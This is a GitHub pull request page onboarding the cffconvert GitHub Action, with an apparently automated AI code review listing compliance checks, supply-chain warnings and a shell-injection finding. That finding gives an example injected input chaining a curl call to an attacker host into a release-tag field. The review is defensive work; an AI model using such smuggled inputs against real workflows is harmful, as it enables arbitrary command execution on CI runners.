Skip to content

feat: Onboard citation-file-format/cffconvert-github-action action#1

Open
anurag-stepsecurity wants to merge 1 commit into
mainfrom
release
Open

feat: Onboard citation-file-format/cffconvert-github-action action#1
anurag-stepsecurity wants to merge 1 commit into
mainfrom
release

Conversation

@anurag-stepsecurity

Copy link
Copy Markdown
Collaborator

@anurag-stepsecurity anurag-stepsecurity force-pushed the release branch 2 times, most recently from 0fddc30 to 3e87539 Compare July 16, 2026 08:34
Signed-off-by: Anurag Rajawat <anurag@stepsecurity.io>
@anurag-stepsecurity anurag-stepsecurity added the review-required Request Claude AI code review on the PR label Jul 16, 2026
@github-actions

Copy link
Copy Markdown

PR Review

Action Type

Docker-based action — uses a local Dockerfile with runs.using: docker in action.yml.


✅ Passed Checks

  • SECURITY.md is present
  • action.yml is present with author: 'step-security'
  • No FUNDING.yml / funding.yml present
  • .github/workflows/ contains both auto_cherry_pick.yml and actions_release.yml
  • No renovate.json present
  • No PULL_REQUEST.md present
  • No ISSUE_TEMPLATE folder present
  • No CHANGELOG.md present
  • No .vscode folder present
  • README.md contains the StepSecurity Maintained Action banner
  • README examples use only major version tag (@v2), not full semver
  • Subscription check is present in entrypoint.sh with the correct API URL
  • UPSTREAM value (citation-file-format/cffconvert-github-action) correctly matches original-owner/repo-name from auto_cherry_pick.yml

❌ Failed Checks

  • License missing original author copyright: LICENSE contains only Copyright (c) 2026 StepSecurity. The copyright of the original author (citation-file-format) must also be present alongside the StepSecurity copyright.
  • Action does not use a published Docker image: action.yml has image: Dockerfile which builds locally on every run. It must reference a pre-built published image from the step-security GitHub Container Registry (e.g., image: 'docker://ghcr.io/step-security/cffconvert-github-action:v2').
  • Docker image not tagged with major version: The docker.yml publish workflow only pushes a full semver tag (e.g., v2.0.0). A major-version alias (e.g., v2) must also be pushed so that image references resolve correctly.

⚠️ Warnings

  • docker.yml uses actions/checkout@v6: Verify v6 is a valid current major version tag for actions/checkout.
  • selftest.yml uses actions/checkout@v7: Verify v7 is a valid current major version tag for actions/checkout.
  • Dockerfile base image not digest-pinned: python:3.13-alpine is a mutable tag. Pinning with a digest eliminates the supply-chain risk of the tag being silently updated upstream.
  • Unsafe JSON construction in entrypoint.sh: The JSON body is built with printf string substitution. If $ACTION_REPO or $SERVER_URL contains a double-quote or backslash, the payload will be malformed. Use jq -n --arg for safe encoding.

🔒 Security Findings

Shell injection in docker.yml (line 29): TAG=${{ github.event.inputs.release_tag }} interpolates the raw workflow_dispatch input directly into the shell at YAML-evaluation time. A crafted input can execute arbitrary commands. Fix: pass the value through an environment variable and reference $RELEASE_TAG in the script body.


Summary

The action is well-structured overall — subscription checking, author attribution, the StepSecurity banner, and required workflow files are all in place. However, three required checks fail (missing original-author copyright, local Dockerfile used instead of a published image, no major-version Docker tag published), and a shell-injection vulnerability in docker.yml must be resolved before this PR is ready to merge.

Comment thread action.yml
description: "Validate CITATION.cff files, and convert to other citation formats."
name: cffconvert
runs:
image: Dockerfile

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Failed check: Action must use a published Docker image

image: Dockerfile builds the Docker image locally on every action run. The requirement is to use a pre-built image published to the step-security org on GitHub Container Registry, tagged with only the major version:

Suggested change
image: Dockerfile
image: 'docker://ghcr.io/step-security/cffconvert-github-action:v2'

The docker.yml workflow must also be updated to push this major-version tag alongside the full semver tag.

uses: actions/checkout@v6
- name: Validate tag format
run: |
TAG=${{ github.event.inputs.release_tag }}

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Security: Shell injection vulnerability

TAG=${{ github.event.inputs.release_tag }} injects the raw workflow_dispatch input directly into the shell at YAML-evaluation time (before the shell runs). A crafted input such as v1.0.0; curl http://attacker.com would execute arbitrary commands.

Fix — reference the value through an environment variable instead:

Suggested change
TAG=${{ github.event.inputs.release_tag }}
RELEASE_TAG: ${{ github.event.inputs.release_tag }}

push: true
platforms: linux/amd64,linux/arm64
tags: |
ghcr.io/${{ github.repository }}:${{ github.event.inputs.release_tag }}

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Failed check: Docker image must be tagged with major version

Only the full semver tag is pushed here. A major-version alias (e.g., v2) must also be included so consumers (and action.yml's image: field) can pin to a stable major version without tracking individual patch releases:

Suggested change
ghcr.io/${{ github.repository }}:${{ github.event.inputs.release_tag }}
tags: |
ghcr.io/${{ github.repository }}:${{ github.event.inputs.release_tag }}
ghcr.io/${{ github.repository }}:v${{ steps.parse_version.outputs.major }}

You will need an earlier step to extract the major version number from the tag (e.g., echo "$RELEASE_TAG" | cut -d. -f1 | tr -d v).

Comment thread LICENSE
same "printed page" as the copyright notice for easier
identification within third-party archives.

Copyright (c) 2026 StepSecurity

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Failed check: Missing original author copyright

Only the StepSecurity copyright is present. The original author's copyright must also be included. Add the original copyright above this line:

Suggested change
Copyright (c) 2026 StepSecurity
Copyright (c) 2019 Netherlands eScience Center and University of Groningen (citation-file-format)
Copyright (c) 2026 StepSecurity

Adjust the year and exact entity name to match what the upstream project uses.

Comment thread Dockerfile
@@ -0,0 +1,10 @@
FROM python:3.13-alpine

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Warning: Mutable base image tag

python:3.13-alpine is a floating tag that can be silently updated upstream, creating a supply-chain risk. Pin to a specific digest to make the build reproducible and auditable:

Suggested change
FROM python:3.13-alpine
FROM python:3.13-alpine@sha256:<digest>

Retrieve the current digest with: docker inspect --format='{{index .RepoDigests 0}}' python:3.13-alpine

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

delete this file

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

review-required Request Claude AI code review on the PR

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants